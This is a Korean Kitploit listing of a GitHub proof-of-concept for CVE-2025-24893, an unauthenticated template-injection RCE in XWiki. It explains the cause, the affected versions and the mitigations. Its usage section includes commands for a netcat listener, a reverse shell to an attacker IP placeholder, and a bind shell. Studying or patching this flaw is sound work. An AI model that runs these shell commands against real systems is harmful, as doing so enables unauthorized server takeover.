Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-24893-PoC — CVE-2025-24893에 대한 개념 증명: 안전하지 않은 서버 측 템플릿 평가를 통한 XWiki에서의 인증되지 않은 원격 명령 실행을 시연합니다. | Kitploit
도구/GitHubGitHub/breakingrohit/cve-2025-24893-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & EducationPayload Development
GitHubbreakingrohit/cve-2025-24893-poc

CVE-2025-24893-PoC

CVE-2025-24893에 대한 개념 증명: 안전하지 않은 서버 측 템플릿 평가를 통한 XWiki에서의 인증되지 않은 원격 명령 실행을 시연합니다.

저장소 보기
228개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-24893 – XWiki 원격 명령 실행 (개념 증명)

개요

이 저장소는 XWiki에 영향을 미치는 인증되지 않은 원격 명령 실행(RCE) 취약점인 CVE-2025-24893에 대한 **통제된 개념 증명(PoC)**을 포함하고 있습니다.

이 취약점은 안전하지 않은 서버 측 템플릿 및 스크립트 평가로 인해 공격자가 서버에서 임의의 운영 체제 명령을 실행할 수 있도록 합니다.


XWiki 소개

XWiki는 일반적으로 다음과 같은 용도로 사용되는 오픈소스 엔터프라이즈 위키 플랫폼입니다:

  • 내부 문서
  • 지식 베이스
  • 팀 협업 포털

XWiki는 인터넷에 노출된 서버에 자주 배포되므로 요청 처리 및 스크립팅 로직의 보안 취약점은 실제 환경에서 큰 영향을 미칠 수 있습니다.


취약점 요약

  • CVE ID: CVE-2025-24893
  • Category: 원격 명령 실행으로 이어지는 서버 측 템플릿 인젝션
  • 공격 벡터: HTTP GET 요청
  • 인증 필요: 없음
  • 영향: 서버 권한으로 임의의 명령 실행

근본 원인

SolrSearch 엔드포인트에 전달된 사용자 제어 입력이 Groovy 스크립팅 엔진에 의해 부적절하게 검증되고 평가되었습니다. 이로 인해 공격자가 제공한 입력이 실행 가능한 서버 측 코드로 해석되어 호스트 시스템에서 명령이 실행될 수 있었습니다.


영향을 받는 버전

  • XWiki 버전 15.10.10까지 포함
  • 이후 릴리스에서 패치됨

개념 증명 기능

이 PoC는 다음을 시연합니다:

  • 취약점 탐지 모드 안전한 서버 측 표현식을 실행하여 대상 인스턴스가 취약한지 확인합니다.
  • 원격 명령 실행 대상 시스템에서 임의의 명령 실행을 시연합니다.
  • 리버스 셸 실행 대상에서 테스터로의 아웃바운드 셸 연결을 설정합니다.
  • 바인드 셸 (선택 사항) 대상 호스트에서 수신 셸을 엽니다 (리버스 셸보다 신뢰성이 낮습니다).

사용법

취약점 확인

root@kitploit:~
python3 xwiki_cve_2025_24893.py http://target:8080 -m check

리버스 셸 (권장)

root@kitploit:~
nc -lvnp 4444
python3 xwiki_cve_2025_24893.py http://target:8080 -m reverse -lh <attacker_ip> -lp 4444

바인드 셸

root@kitploit:~
python3 xwiki_cve_2025_24893.py http://target:8080 -m bind -lp 4444

높은 수준의 공격 흐름

  1. 조작된 요청이 취약한 SolrSearch 엔드포인트로 전송됩니다.
  2. 악성 템플릿 명령어가 사용자 제어 입력을 통해 주입됩니다.
  3. 입력이 Groovy 엔진에 의해 신뢰된 코드로 평가됩니다.
  4. 서버에서 임의의 운영 체제 명령이 실행됩니다.

완화 지침

  • 즉시 패치된 버전으로 XWiki 업그레이드
  • 가능한 경우 내부 엔드포인트에 대한 액세스 제한
  • 서버 측 스크립팅 기능 제한 또는 샌드박싱
  • 비정상적인 템플릿 실행 동작에 대한 애플리케이션 로그 모니터링

면책 조항

이 프로젝트는 교육 목적 및 승인된 보안 테스트를 위해서만 제공됩니다.

명시적 허가 없이 시스템에 대해 이 코드를 무단으로 사용하는 것은 금지됩니다.


크레딧

  • 원본 취약점 연구 및 PoC 영감: Al Baradi Joy
  • 교육 및 방어적 보안 연구를 위해 리팩토링 및 확장됨

이 저장소의 목적

이 저장소는 다음을 시연하기 위해 생성되었습니다:

  • 실제 취약점 분석
  • 안전하고 책임 있는 개념 증명 개발
  • 서버 측 템플릿 인젝션 및 RCE 위험 이해
  • 방어 인식 및 완화 고려 사항
도구 다운로드